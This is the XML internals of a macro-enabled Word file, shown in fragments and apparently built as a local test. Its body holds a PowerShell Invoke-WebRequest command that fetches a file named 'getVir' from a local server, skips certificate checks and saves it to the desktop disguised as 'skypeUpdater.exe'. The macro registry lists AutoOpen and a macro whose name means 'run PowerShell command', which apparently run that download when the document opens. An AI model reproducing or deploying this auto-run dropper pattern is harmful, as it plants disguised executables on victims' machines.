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698A6D" w14:textId="7D6DCEBA" w:rsidR="00CA0AF5" w:rsidRDefault="00404ADA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00404ADA">
        <w:t>Invoke-WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00404ADA">
        <w:t xml:space="preserve"> -Uri 'https://127.0.0.1:8443/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00404ADA">
        <w:t>getVir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00404ADA">
        <w:t>' -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00404ADA">
        <w:t>OutFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00404ADA">
        <w:t xml:space="preserve"> 'C:\Users\picco\OneDrive\Desktop\skypeUpdater.exe' -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00404ADA">
        <w:t>SkipCertificateCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00CA0AF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B97"/>
    <w:rsid w:val="003E0F5A"/>
    <w:rsid w:val="00404ADA"/>
    <w:rsid w:val="00791831"/>
    <w:rsid w:val="00CA0AF5"/>
    <w:rsid w:val="00D12262"/>
    <w:rsid w:val="00DC4086"/>
    <w:rsid w:val="00EF3B97"/>
    <w:rsid w:val="00F5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8C0BCD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ABA6BB38-9CF6-4FF5-883E-1C526D9169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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B97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EF3B97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EF3B97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EF3B97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EF3B97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EF3B97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EF3B9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EF3B9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EF3B9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EF3B9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EF3B9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EF3B97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EF3B97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EF3B97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EF3B9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EF3B97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EF3B9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O1.AUTOOPEN" wne:name="Project.Modulo1.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULO1.ESEGUICOMANDOPOWERSHELL" wne:name="Project.Modulo1.EseguiComandoPower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117</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Nicolò Piccoli</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nicolò Piccoli</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-06T18:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-06T19:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>